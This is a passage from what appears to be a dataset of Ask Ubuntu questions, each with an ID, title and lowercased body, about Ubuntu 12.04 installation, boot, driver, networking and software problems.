night 's sleep . echo $ path ; ls -l /usr/local/bin /usr/lib/lightdm/lightdm : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games total 132 -rwxr-xr-x 1 root root 2914 jun 18 15:58 gitin -rwxr-xr-x 1 root root 2914 jun 18 15:58 gitout -rwxr-xr-x 1 root root 120109 jun 18 15:59 gits -rwxr-xr-x 1 root root 3331 jun 18 15:58 gits-checkup am i going have to reboot everytime install something to /usr/local/bin ? ( fyi : had this same issue with node-less this morning ... it required another reboot to work )
152547	how do i install the gnome sensors-applet package in unity ?	i want to install sensors-applet onto my ubuntu 12.04 computer . the instructions on this ( and other ) webpages says to enter this command in a command terminal : sudo apt-get install sensors-applet this is a gnome applet and gnome is n't exactly obscure . why can sensors-applet package not be found ? before you say `` no '' , note that i was able to execute `` gnome-panel '' to add a bar/panel along the bottom of my desktop , add 8 cpu-frequency applets to the bar ( one per cpu core ) , and add gnome-panel to my startup applications . so i 've already done the basics , and believe all i need now is to be able to download and install the sensors-applet to have that temperature applet available on the panel too . see here .
152551	hangs problem after logged in	i installed ubuntu 12.04 lts using usb flash drive . the problem is ubuntu stops responding after 1-3 minutes after logging in and it does not respond at all . specifications : processor : amd dual-core c60 ram:2gb ddr3
152553	installed ubuntu 12.04 lsd alongside with windows 7 . no boot menu	i have installed ubuntu 12.04 lts 64-bit alongside with windows 7 . during installation i choose something else and partitioned as followed : partition screenshot and choose /dev/sda for boot loader installation the installation was successful . i never get a boot menu from where i could choose the os . what is the problem ?
152562	executing a c program stored on a windows drive ?	i wrote a simple hello world program but not stored it in ubuntu 's home directory , instead i stored it on one of the windows drives . ( i am using ubuntu 12.04 alongside of windows . ) when i compiled the program it worked just fine but when i tried to execute it i got an error message `` permission denied '' . and when i store the program in ubuntu 's home directory i can perfectly compile and execute the program . so please tell me how to overcome this problem ? ?
152565	merging two office files	how can i take union of two ods according to their column ? what i want , more specificlly ; first compare two ods according to column b then merge them if there is a intersection , ask me what to do or compare two ods files notify which one has same name , according to column b can you recommend me a software , which is available in 12.04 , in order to manage one of these wish ?
152571	ubuntu 12.04 install wo n't boot	i want to replace windows with ubuntu , so i installed it on my hard drive from a usb stick , but every time i try to install it , and when it gets done installing , i reboot the computer but all i get is a black screen with a small line ( the line that marks where you are going to type ) , like its trying to boot from something but it cant find it ( i 've tried to install it about 10 times ) . i have tried to leave the black screen up for 30min to see if it would boot , but nothing . i tried to leave the live ubuntu up all night to see if it was still installing , but nothing , nothing but that black screen . so can anyone help ? computer info : hp pavilion 520n intell cpu @ 1.30ghz 520mb of ram
152574	execute command from unity lens	i am trying to create a unity lens , how to execute a command when we select an entry from unity-lens in the following code results.append ( url , icon , category , mime-type , text , comment , drag and drop url ) i tried to set file : // , but it opens the file with text editor ( if it is not readable with text editor it do nothing ) please help thank you vishnu v
152576	the ubuntu app showdown -specific software	i would like to participate the contest but i 'm programming very specific scientific tools for the work in a molecular biological lab . i know that i wo n't win with such an app but it 's a nice possibility to get into qickly and ubuntu apps since i 'm only programming for windows at the moment . my question is , whether i have a possibility to explain what my software is doing and for what it is good in the lab . also i have to provide some test data , that the jury can try it out . is this possible and how i can submit those additional information ?
152578	problem typing password when running sudo in terminal	i have a different problem.when first time i used ubuntu old to new in every version i can easily type password in terminal after sudo command.but now a day i ca n't because in terminal after sudo command in password i ca n't able to type any thing like char or number , but just in password other part in terminal i can type . now , probelm is there that it do n't show password means not that in terminal password is in hide mode.every time i type in after that it show me '' sorry , try again '' error message after three time wrong password means empty password it 's again come into first position . for solve this problem i used old to new version of ubuntu also format it many time but same problem occured . please help me because without terminal password i ca n't install anything .
152587	12.04 , how to switch gnome-fallback to use metacity permanently ?	i upgraded to 12.04 recently and found that my vnc connection would n't update , specifically when i connected it would display the desktop as it was , but would not update further . i found disabling compositing by doing metacity -- replace fixes this , however this does not `` stick '' and needs to be done every time i reboot the machine , how can i make this permanent ? thanks in advance .
152588	can i add a regular download link to software sources or 'sources.list ' ?	in software sources i see a lot of links that do n't link to lanchpad.net http : //deb.playonlinux.com/ oreiric main http : //dl.google.com/linuxearth/deb/ stable main http : //linux.dropbox.com/ubuntu precise main i was wondering : can i add a regular download link in my sources.list . here is what i mean to do . this is the download link for notepad++ ( an example ) http : //download.tuxfamily.org/notepadplus/6.1.3/npp.6.1.3.installer.exe i wonder can i add this ( or an other ) link to download the latest version of notepad++ ( or any software for that matter ) and every time there is a new version of notepad++ i can install the latest via update-manager . this is exactly when adding vlc ( a example ) in the sources.list . and when the software . has been downloaded to run a command like wine npp.6.1.3.installer.exe /s /silent for silent installation .
152590	integrating internet download manager , which installed in virtual box , with firefox or chromium , installed on ubuntu 12.04 ( host os )	maybe my question be kind of strange but i hope i can get a good answer . i have installed win xp on virtual box in ubuntu 12.04 , and i installed idm on it . so , i want when i clicked on a downloadable link in ubuntu ( the host os ) , the idm can grab the link and download it in win xp ( the guest os ) ! before that i wan na thank you .
152593	command-line to list dns servers	is there a command to list dns servers ? i tried $ cat /etc/resolv.conf # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 127.0.0.1 $ cat /etc/network/interfaces # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback but it does n't list any servers , if i go to `` network manager gui tool '' , in wireless section it lists `` dns 192.168.1.1 8.8.8.8 8.8.4.4 '' can i get same information from command line ? i am using ubuntu 12.04 lts
152596	ca n't enable wifi on vaio cw ubuntu 12.04	i was using my wifi with no problem , but an hour ago i switched it off from system settings and then tried to turn it on again , but no success . it 's about 1 month i am using it and i had no problem with wifi except this one . i rebooted and went to windows 7 , but even that os ca n't turn it on . this is rfkill list all : 0 : sony-wifi : wireless lan soft blocked : yes hard blocked : yes 1 : sony-bluetooth : bluetooth soft blocked : yes hard blocked : yes 2 : phy0 : wireless lan soft blocked : yes hard blocked : yes
152600	my ubuntu 12.04 installed dvd-rw recorder pata as scsi	ubuntu 12.04 64-bit installed dvd-rw recorder pata as scsi . my dvd-rw recorder is in /dev/sr0 as scsi . i opened disk management and my ide pata drive is installed as scsi . i ca n't use this drive because it hangs computer ( i need to press reset button on cpu to get back to ubuntu ) . what should i do to get the drive back to function correctly with the correct drive ( ide mode ) ? also with the first ( default ) kernel version of the ubuntu 12.04 64-bit , it was all functioning normally help me please .
152602	is there a per-application volume control indicator ?	there was per-application volume control applet for gnome 2 . there is a per-app volume control extension for gnome-shell . is there any indicator applet for unity like this two ?
152605	how to define default gateway with multiple dhcp interfaces ?	how does ifconfig determine which network interface to use as the default when dhcp assigns a default route for each nic ? it seems like it 's in a race-condition and i need to have a more reliable solution . is there a setting in /etc/network/interfaces that could define the preferred gateway ? i read about `` metric '' but that did not seem to function . 10.04 lts server with two nics on a managed network . ip addresses are assigned via dhcp which i do not manage . eth0 is assigned a private nat address ; eth1 is assigned a public ip .
152607	ca n't make a file executable	i 'm using ubuntu 12.04 64bit and i 'm trying to make a file executable , but when i check the `` allow executing file as program '' , the check mark appears then disappear spontaneously . if it could help , my file 's name is iourbanterror.x86_64 thank you .
152620	what learning to read software is available ?	what packages are available for ubuntu to help a 7 year old child learn to read ? i 've seen gcompris , but not sure that will be developed enough . what other packages would be compatible for ubuntu ( 10.10 , or 11.4 ) ?
152621	why are text files created on ubuntu not recognised as windows notepad files ?	whenever i want to access a text file created on ubuntu using windows , it looks as if the file extension is not recognised . i always have to choose open with and then select notepad . is there any way to create text files on ubuntu that are identical to windows text files ?
152626	working around active directory users	in my office system , ubuntu is configured for active directory authentication with windows using likewise open . i have three issues . each time when i switch on my system and some times when i restart , lightdm lists two users , administrator ( ubuntu 's default power user ) and guest user . so active directory accounts are not listed here . why ? i have to login with guest and then logout to have my active directory accounts listed in the lightdm greeter . what is the reason that active directory users are loaded after a local user is logged in and then logged out ? after doing the step # 2 , i also get some additional users ( accounts of network guys ) probably those who once logged in via my machine . how to remove those undesired accounts to appear in lieghtdm user list ?
152631	how do i create a debian branch for my project on launchpad ?	i have a project on launchpad that consists of a single branch ( trunk ) . i would like to create a second branch that contains the debian packaging for the project ( with the intent of creating a build recipe that merges it into the main branch before building ) . i 've done this before by just pushing a local branch to lp : ~me/project_name/debian . however , this stacks the branch with trunk , which i do n't want ( it becomes impossible to delete trunk without deleting the debian packaging branch - a restriction that has caused problems before ) . what is the proper way to do this ?
152638	package system broken amd fglrx unmet dependencies	i uninstalled propriety ati driver to check if it would fix wrong plymouth resolution . it did . but now i can not reinstall either propriety drivers listed . also package system has broken with this error : the package system is broken if you are using third party repositories then disable them , since they are a common source of problems . now run the following command in a terminal : apt-get install -f the following packages have unmet dependencies : fglrx-amdcccle : depends : fglrx but it is not installed depends : libqtcore4 ( > = 4:4.5.3 ) but 4:4.8.1-0ubuntu4.1 is installed depends : libqtgui4 ( > = 4:4.5.3 ) but 4:4.8.1-0ubuntu4.1 is installed what should i do ?
152643	how do i get past this dependency ?	i 'm trying to install libgcal , and when i run ./configure i get the following error : configure : error : `` * libxml2 not found ! you need it to build library gcalendar . * '' i installed libxml2 from the repositories but it still gives me this error . can someone please help ?
152648	howto choose custom programs to open specific file types ?	i installed gpicview ( to view pictures , as the name suggests ) . i want it to be the default image viewer program , but it is not listed in the application list ( right click on an image- > properties- > open with ... ) . i also downloaded some programs ( not in the repository ) , and i couldnât find out how to associate them with a file type . as i remember it , in some older versions of ubuntu , there was an option `` browse ... '' , and you could choose the programs you want to use . is it still possible to do so now ? and i think the `` open with '' function looks a bit clumsy , because it lists the same program several times ( for some programs installed through wine ) . anyone knows how to fix it ? ( i am using ubuntu 12.04 now ) edit : pcmanfm works fine in this case .
152652	how can i fully remove ubuntu 12.04 from my macbook pro ?	i want to remove ubuntu 12.04 from my macbook pro . it 's a trial boot system , with macos in the first partition , windows 7 in the second one , and ubuntu in the last . now , i want to format this last one , in order to expand the windows partition . i tried to do this from macos , but i could not . everyone can help me , please ? ( when i insert the ubuntu live cd , after some initial boot screens , the command line says that it ca n't find the medium ... it can not see my ubuntu cd ! )
152653	what should i do about this error ?	jonquil @ jonquil-satellite-l755d : ~/downloads/akonadi-googledata-1.2.0/build $ cmake .. -- the c compiler identification is gnu -- the cxx compiler identification is unknown -- check for working c compiler : /usr/bin/gcc -- check for working c compiler : /usr/bin/gcc -- works -- detecting c compiler abi info -- detecting c compiler abi info - done cmake error : your cxx compiler : `` cmake_cxx_compiler-notfound '' was not found . please set cmake_cxx_compiler to a valid compiler path or name . cmake error at /usr/share/cmake-2.8/modules/findkde4.cmake:98 ( message ) : error : cmake/modules/findkde4internal.cmake not found in /home/jonquil/.kde/share/apps ; /usr/share/kubuntu-default-settings/kde4-profile/default/share/apps ; /usr/share/kde4/apps call stack ( most recent call first ) : cmakelists.txt:6 ( find_package ) cmake warning ( dev ) in cmakelists.txt : no cmake_minimum_required command is present . a line of code such as cmake_minimum_required ( version 2.8 ) should be added at the top of the file . the version specified may be lower if you wish to support older cmake versions for this project . for more information run `` cmake -- help-policy cmp0000 '' . this warning is for project developers . use -wno-dev to suppress it . -- configuring incomplete , errors occurred ! with autotools i get this : jonquil @ jonquil-satellite-l755d : ~/downloads/akonadi-googledata-1.2.0/build/build $ autoreconf -i -f ca n't exec `` libtoolize '' : no such file or directory at /usr/bin/autoreconf line 196 . use of uninitialized value in pattern match ( m// ) at /usr/bin/autoreconf line 196. autoreconf : `configure.ac ' or `configure.in ' is required
152655	ubuntu does n't recognize intel hd graphics 3000	i have ubuntu installed on a macbook pro 8.1 and it does n't recognize my graphics card ( intel hd graphics 3000 ) and i want to know why is this happening and how to make that ubuntu recognizes my graphics card . plus , if someone knows how to enable the subwoofer on the os i wpuld thank you very much .
152658	failed google earth install ?	attempted to install google-earth-stable 6.2.from the google earth downloads . so i have a broken package and a new download in the dl file . synaptic and software centre lockup so i can not fix the package , un-install , re-install . what 's next ? thank you
152661	warm reboot directly to grub	is it possible to warm-reboot linux , directly reloading grub without passing through the bios ? i have a computer whose bios is buggy and takes a while due to its hating my disks so if i can reboot directly to grub it would be great . to those that are confused : i 'm looking for is a kernel module that acts to unload the kernel and execute the boot sector upon a `` reboot '' . here are my system specs : emachines el1200-06w with an amd athlon 64 dmidecode output lspci output
152668	i can not set my system back to english from chinese language	i once turned my system to chinese , now i can not set it back to english . i tried to change the order in language settings , but it does n't work . chinese is always at the top . even if i delete the language package of chinese , it still remains . the menu of the system will return english , but all the softwares as well as the top bar remains in chinese . i also tried to reset /etc/default/locale and /etc/environment but it does n't work . root @ ks356457 : ~ # cat /etc/environment path= '' /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games '' language= '' en_us : en_gb : zh_cn : de_de : en_au : en_ca : en_nz : en '' lang= '' en_us.utf-8 '' lc_all= '' en_us.utf-8 '' lc_numeric= '' en_us.utf-8 '' lc_time= '' en_us.utf-8 '' lc_monetary= '' en_us.utf-8 '' lc_paper= '' en_us.utf-8 '' lc_identification= '' en_us.utf-8 '' lc_name= '' en_us.utf-8 '' lc_address= '' en_us.utf-8 '' lc_telephone= '' en_us.utf-8 '' lc_measurement= '' en_us.utf-8 '' root @ ks356457 : ~ # cat /etc/default/locale lang= '' en_us.utf-8 '' language= '' en_us : en_gb : zh_cn : de_de : en_au : en_ca : en_nz : en '' lc_all= '' en_us.utf-8 '' lc_numeric= '' en_us.utf-8 '' lc_time= '' en_us.utf-8 '' lc_monetary= '' en_us.utf-8 '' lc_paper= '' en_us.utf-8 '' lc_identification= '' en_us.utf-8 '' lc_name= '' en_us.utf-8 '' lc_address= '' en_us.utf-8 '' lc_telephone= '' en_us.utf-8 '' lc_measurement= '' en_us.utf-8 '' root @ ks356457 : ~ # echo $ lang $ language zh_cn.utf-8 zh_cn : en this is a remote server and i use remote desktop via x2go so i ca n't set the language before i log in as a local machine , either . how do i get english back ? thanks a lot .
152669	python/gtk3 app crashing on importing `` indicate '' ( python-indicate )	i 'm trying to integrate my python/gtk3 app with ubuntu 's messaging menu and every time i try to import `` indicate '' ( python-indicate ) my app crashes , with the following traceback : /usr/lib/python2.7/dist-packages/gobject/constants.py:24 : warning : g_boxed_type_register_static : assertion `g_type_from_name ( name ) == 0 ' failed import gobject._gobject /usr/lib/python2.7/dist-packages/gtk-2.0/gtk/__init__.py:40 : warning : specified class size for type `pygtkgenericcellrenderer ' is smaller than the parent type 's `gtkcellrenderer ' class size from gtk import _gtk /usr/lib/python2.7/dist-packages/gtk-2.0/gtk/__init__.py:40 : warning : g_type_get_qdata : assertion `node ! = null ' failed from gtk import _gtk this looks like some sort of clash between gtk2 and gtk3 ... anyway , how would i go about fixing this ? thanks .
152670	is it possible to dual boot mac osx lion with ubuntu 12.04 ?	i 've read that it can be dangerous for your computer to try to run ubuntu and that the safest option is to run it on an external hard drive . is this true ? ( i do n't want to run it through a virtual machine . ) i would prefer to dual boot it , given that my hard drive has so much space . update : so does this mean that even if i have ubuntu installed , that my data would still be at risk due to , say , stability issues ?
152675	how can i send file to playbook via usb ?	is there any way to send files to rim playbook via usb ? i see device in lsusb ( listed as id 0fca:8020 research in motion , ltd ) , but device is not mounted in nautilus .
152678	ubuntu 12.04 : hp photosmart 6515 only wired ?	i 'm using ubuntu 12.04 . i 've plugged the hp photosmart 6515 usb cable and ubuntu automatically detected it and was able to print/scan through the usb cable . i connected the printer to the wireless which my laptop is connected to . i try to use the printer wirelessly but it did n't seem to work . how can i solve this ? thank you .
152683	using a huawei 366 broadband stick with ubuntu 12.04 lts 64bit and getting a faster connection than gsm	i am using ubuntu 12.04 lts 64bit and a huawei 366 broadband usb datastick . i can access the internet after manually turning it on from the menu , in 10.04 lts i had it running automatically , but for some reason despite being in a 4g area , i get a connected to the gsm network message . is there a way to get it to search for the faster network . i have already selected 3g preferred in connection settings . thanks
152685	quickly packaging errors	i 'm having some trouble packaging my quickly ( python/gtk ) app . creating and packaging a new app ( created using quickly create test and cd test ; quickly package ) works just fine , but the actual app that i 've developed fails to get packaged . here 's the log : ... ... ... .. -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- command returned some errors : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- error : python module helpers not found error : python module ubermessageconfig not found error : python module builder not found error : python module window not found -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- however , these modules do exist in app/app_lib . what 's causing the errors , then ? help appreciated .
152691	youtube shows `` missing plug-in '' in window after installing flash	after installing ubuntu 12.04 lts 32-bit , i have installed ubuntu restricted extras , configured medibuntu , and installed synaptic package manager . i tried to install adobe flash player by installing chromium . i also files to play encrypted dvds . i have n't been able to locate the flashplayer file in the /usr/lib folders , which i assume should be there . i do n't know if this is why i ca n't see videos at youtube . not sure where else to look .
152694	how do i make windows games run smoothly on ubuntu 12.04 ?	i need help in making windows games like gta , fear , cod , company of heroes etc . run smoothly on ubuntu 12.04 . i want this on my hp compaq dx6100mt pc , i am having an intel graphics card .
152695	can i connect my ubuntu laptop to my hdtv wirelessly ?	there are some devices that allow to connect laptops to high definition tvs . one good example is intel widi device . the problem is that most of them do not support linux/ubuntu . it would be nice to stream movies , pictures , etc ... from my coffee table to my tv without using a long hdmi cable . i was wondering if anyone knows a similar device that supports ubuntu . thanks !
152702	icedtea in chrome wo n't load java applets	icedtea in chrome wo n't load java applets such as minecraft and runescape . it shows a gray screen instead . i 've tried and failed to install the java plugin for chrome and it 's left me wondering why icedtea wont 's work ! ?
152705	command 'setenv ' not found upon installation of crystal09 program	command 'setenv ' not found i use ubuntu 11.04 i tried to install the program `` crystal09 '' and in the tutorial asks you to copy the file cry2k9.cshrc to the home directory . i copied the file , but when i do the command `` source cry2k9.cshrc '' ( which is the installation tutorial ) the following error appears ( this error message is in portuguese-br ) : ( translated : edit ) command 'setenv ' not found , did you mean : command 'netenv ' package 'netenv ' ( universe ) setenv : command not found command 'setenv ' not found , did you mean : command 'netenv ' package 'netenv ' ( universe ) setenv : command not found cry2k9_scrdir - scratch directory ( integrals and temp files ) : cry2k9_exedir - directory with crystal executables : cry2k9_utils - running scripts and misc : /runcry09 , runprop09 cry2k6_gra - graphical scripts : /maps06 , doss06 , band06 cry2k9_test - directory with test cases :
152707	how to make user home folder after account creation ?	i created a new user with useradd name and forgot to use -d -m to create their home directory . i tried making one , copying the contents of /etc/skel , and chowning everything to the new user . aliases do n't work , such as ll , and i just have a $ at the command prompt , instead of name @ server ~ $ . also , using the scroll wheel dumps garbage on the command line : ( how do i fix this , or is it easier to delete the user and start over ?
152716	how to detect a memory leak ?	i seem to have a larger memory leak on my current ubuntu system after reporting strange eclipse memory errors ( eclipse : constant , different out of memory errors ) i started to get 'not enough memory ' error messages in my console today - while doing simple tasks like typing in sudo -s - or even - free -m typing in 'free -m ' repeadetly showed me how my ram quickly goes up from 700m to 900m , growing up to the size of 2000m in a few seconds ( after freeing up memory with echo 3 > /proc/sys/vm/drop_caches ) eclipse isnt the cause , i completly killed the process and the ram still was going up . is there any way to detect where the leak is coming from ? i cant even update my system anymore , since apt-get update fails ( probably because it 's out of memory ) using ubuntu 11.10
152727	can not use sudo from live cd	i had to reinstall windows . unfortunately , this means that grub is n't working . booted from live cd , opened terminal and typed : sudo update-grub but got the message returned sudo : ca n't stat /etc/sudoers : input/output error sudo : no valid sudoers sources found , quitting tried without sudo , it told me i had to be root to do it .
152731	should i install the recommendations apt-get gives me when installing vim ?	i installed the text-editor `` vim '' on my ubuntu desktop 12.04 ( running as a guest vm on a win 7 host via virtualbox ) . i used the command `` sudo apt-get install vim '' , and the following `` recommended additions '' came up : ctags vim-doc vim-scripts i am still relatively new to linux and am learning the basic commands , so i have little to no idea what these recommended additions are or if i should download them . i mostly downloaded vim as a practice for the `` apt-get '' command . also , upon starting vim up ( sudo vim ) , i can go into insert mode via pressing 'a ' and escape insert mode via pressing 'esc ' , but beyond that , i do n't know how to quit vim ( asides from forcing the terminal to close by manually x'ing out of it ) or how to save changes i 've made . for example , i have a word doc saved in /home/documents/vmtext.odt does it make sense to use the command sudo vim /home/documents/vmtext.odt to edit the word doc through vim , as opposed to just opening the word doc and editing it directly ?
152733	how can i remove all updates installed after a specific date ?	i have allowed the update manager to install a 200 mib of updates , and i think that these update run my graphics driver into a problem . so , i need a way to remove the updates that have been installed since 30th of may 12 for example ( or any other date ) . if i have to remove them manually ( in the case of uninstalling them one by one ) , you are kindly requested to give me the instructions of how to do that .
152734	reset boot-repair options	i have boot-repair installed and it was working fine until one day i checked the option `` purge grub before reinstalling it '' and went ahead and did what it said . but now , i tried to fix the grub and was off-line so i could n't do it . then i realized that the option `` purge grub before reinstalling it '' is grayed , so i ca n't uncheck it . i purged boot-repair and reinstalled it but the problem continues . i 've been thinking there 's probably a configuration file i have to reset or delete so the option is available again .
152736	installation failed with a blank screen	blank screen , no fix i 've tried works ... hardware conflict maybe ? first i tried amd64 ubuntu desktop . i got into the boot screen , however selecting install returns 1-2 seconds of code then blank screen no-idle . then i tried the alternate install . worked , some additional software installs failed . go to boot for first time , i see bios load then black/blank screen . no flicker or cursor ... screen turns off . ( i am also having issues installing any 64bit os legit win 7 64 ult. , winxp 64 pro iso , also winxp 32 legit , winxp 64pro iso returns bsod on install . all win 7 builds return with cd/dvd driver error . the only os that installs is beta build 7000 win 7 . ) please help ! i am using : bios build = e7696ams v1.5 hdd = hitachi hdp725050gla 500.00 gb ( sata ) cdd = optiarc dvd rw ad-72 ( sata ) mobo = msi a75ma-g55 amd a series motherboard - micro atx , socket fm1 , amd a75 chipset , 1866mhz ddr3 ( o.c . ) , sata 6.0 gb/s , 8-ch audio , gigabit lan , superspeed usb 3.0 , amd dual graphics ready cpu = amd a6-series ad3650wngxbox quad-core a6-3650 apu - 4mb l2 cache , 2.6ghz , socket fm1 , radeon hd 6530d ( 320 cores ) , dual graphics ready , directx 11 ram = corsair cmz16gx3m4a1600c9b vengeance desktop memory kit - 16gb ( 4x 4gb ) , pc3-12800 , ddr3-1600mhz , 9-9-9-24 cas latency , intel xmp ready , unbuffered
152742	how to enable mouse wheel in virtualbox ?	i 've installed on my host ubuntu 10.04 in virtualbox guest operating system ubuntu 12.04 . and mouse wheel does n't scroll vertically the contents of a window . in host works normally . virtualbox mouse indicator in the right bottom corner flashhes when i 'm using mouse wheel .
152743	how do i configure networking when using xen on 12.04 server	i 'm following this guide , https : //help.ubuntu.com/community/xenproposed , and i 'd like to setup a static ip address , but i do n't know how . i 'm using 12.04 server . this is the step i 'm having trouble at ( i 'm using eth1 ) : edit /etc/network/interfaces , and make it look like this : auto lo iface lo inet loopback auto xenbr0 iface xenbr0 inet dhcp bridge_ports eth0 auto eth0 iface eth0 inet manual i do this , and here is my output from ifconfig : eth1 link encap : ethernet hwaddr 00:17 : a4 : f8:79:20 up broadcast running multicast mtu:1500 metric:1 rx packets:478264 errors:0 dropped:0 overruns:0 frame:0 tx packets:2895 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:46470058 ( 46.4 mb ) tx bytes:214620 ( 214.6 kb ) interrupt:17 memory : fa000000-fa012800 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) xenbr0 link encap : ethernet hwaddr 00:17 : a4 : f8:79:20 inet addr:192.168.1.122 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :217 : a4ff : fef8:7920/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:471842 errors:0 dropped:0 overruns:0 frame:0 tx packets:2795 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:37005780 ( 37.0 mb ) tx bytes:182010 ( 182.0 kb ) so how do i give this system a static ip address ? sorry , i 'm not that familiar with networking on ubuntu .
152749	thunar not showing thumbnails in openbox	i am using openbox 3.5 and my file manager of choice is thunar but the problem i am facing is thunar not showing thumbnails for folder , video files etc . my thunar : you can see in the above image that thunar is not showing thumbnails for folders , files but it is showing for pdf and similar is the case for video files no thumbnails . so , what is wrong here am i missing some basic thunar config files . ranrag @ ranrag : ~ $ echo $ desktop_session openbox i looked into some forums and they mentioned that there is some dependency of tumbler with thunar but i have latest version of tumbler installed on my system . ps : i already tried thunar preferences but still no luck .
152752	how to mount a zfs share over nfs	i am trying to mount a zfs drive to a ubuntu 12.04 server installation . the drive is shared via nfs . i have installed zfs for linux but i still get a : wrong fs type , bad option , bad superblock error . does anyone have any ideas .
152755	conky dropping shadow when invoked at startup	i read this thread but it does n't really address my issue . the problem that i have is that whenever i log in , conky starts up , as set up in startup applications , but the instance it runs is dropping shadow and is above every other window , showing the wallpaper beneath it . this can be easily fixed by relaunching conky , but that defeats the purpose of having it start up at login . also , running conky at any point manually after logging does not cause this . any suggestions ? i rewrote the script and played about with compiz , but it still keeps happening .
152757	mysql not starting - innodb not found	i have a fresh install of ubuntu 12.04 server edition and mysql server is not starting properly . i did a simple apt-get install apt-get install mysql-server but , it 's failing with this error message root @ test : ~ # mysqld 120618 20:57:32 [ warning ] the syntax ' -- log-slow-queries ' is deprecated and will be removed in a future release . please use ' -- slow-query-log'/ ' -- slow-query-log-file ' instead . 120618 20:57:32 [ note ] plugin 'federated ' is disabled . 120618 20:57:32 innodb : the innodb memory heap is disabled 120618 20:57:32 innodb : mutexes and rw_locks use gcc atomic builtins 120618 20:57:32 innodb : compressed tables use zlib 1.2.3.4 120618 20:57:32 innodb : unrecognized value fdatasync for innodb_flush_method 120618 20:57:32 [ error ] plugin 'innodb ' init function returned error . 120618 20:57:32 [ error ] plugin 'innodb ' registration as a storage engine failed . 120618 20:57:32 [ error ] unknown/unsupported storage engine : innodb 120618 20:57:32 [ error ] aborting i can start the server with the `` -- skip-innodb -- default-storage-engine=myisam '' flags , but would like to use innodb . does anyone know what the issue here is ?
152760	dnsmasq not running	i installed ubuntu 12.04 on a netbook with 16gb ssd . to keep the installation small i used the mini.iso i got from here . everything worked fine , but i noticed that dnsmasq does not get started by networkmanager . on a different machine i installed 12.04 from a regular iso and netstat shows dnsmasq running and listening on port 53 . networkmanager.conf look identically on both systems . the line dns=dnsmasq is present . although i do not really need dnsmasq - name resolution works fine without - i would like to know the reason why dnsmasq is running on one system , but does not run on the other and how i could adjust this behavior . thx in advance !
152761	rhythmbox duplicating songs in playlists	i am using an ipod classic 5th gen with rhythmbox and it seems whenever you make a playlist or add songs to an existing playlist it just duplicates the songs everytime you add a new one . so many of my playlists have like 9 duplicates of every song ! is there a way to fix this ? i 'm using ubuntu 12.04 .
152763	import mini dv films from samsung digital cam vp-d353 [ usb ]	i tried to import mini dv films from my old video camera ( samsung vp-d353 ) and it 's not recognised by my lubuntu 12.04 system . i tried `` dvgrab '' which should work , but it does n't . i found this tutorial : http : //www.foscode.com/linux-minidv-usb-video-capture/ but it 's just saying `` waiting for dv '' . i do n't really know what should i do now . here is what i 've got for the camera when i write sudo lsub : bus 002 device 013 : id 04e8:120f samsung electronics co. , ltd
152766	ubuntu 12.04 fails to boot after reboot	i have installed ubuntu 12.04 on several dell c6220 servers . the install was successful and all hardware is recognized . the problem that i am running into is that when issuing the reboot command or when pressing ctrl-alt-del , the server shuts down , but never comes back up . instead , the fan revs up to full speed and stays that way until i power the server down . once the server has been powered down via the power button , ubuntu will boot just fine -- until the next reboot . i have found that by rebooting the server via the drac web interface will reboot the server correctly . i have also found that this problem does not exist with centos -- i can press ctrl-alt-del all day long and it always comes back up . i 've tried several kernel parameters such as : reboot=bios reboot=pci reboot=acpi reboot=cold acpi=off noapic nothing seems to work . i have also tried upgrading to kernel 3.4 , but no change there , either . has anyone run into a similar problem or any pointers on troubleshooting ? thanks , joe
152773	does ubuntu one have maximum traffic or download limits ?	i am planning to share some project files over ubuntu-one . the files will be 1-2 gb big , and i expect downloads from 1000+ people . does ubuntu one has any traffic or download limits ? for example , if only 10 people can download the project and then a `` traffic limit error reached , '' that would not be adequate for my needs .
152777	how does the download cache work ?	i would like to know how the download cache works . is it possible to clear this space , or does this happen automatically ? in my understanding : the download cache is where program files are downloaded before they are actually installed onto the computer . once the `` download '' file is `` installed '' then the file in the download cache is no longer needed . is this correct ?
152779	custom widgets/controls in application indicators	i want to develop an app for ubuntu , that integrates inside the calendar indicator/menu . it should allow to enter info right from it , and have several controls like input boxes , drop downs , spinners and buttons . is this possible to integrate/replace the standard date/time indicator ? if not , is it possible to create it as a separate indicator that when clicked opens a popup with all the controls and stuff ? i want it to look as part of the sys tray and not as a separate desktop app . i 'm using quickly for this . thanks for your help !
152781	how do i get an epson perfection v200 photo scanner working ?	i 'm new to ubuntu . i installed 12.04 64bit , pc is working great , but i ca n't get my scanner to work . i tried to 'just scan ' with simple-scan , but i got the following error '' error : no scanner detected , please check your scanner is connected an powered on '' but the scanner is powere on . i use an epson perfection v200 photo scanner via usb .
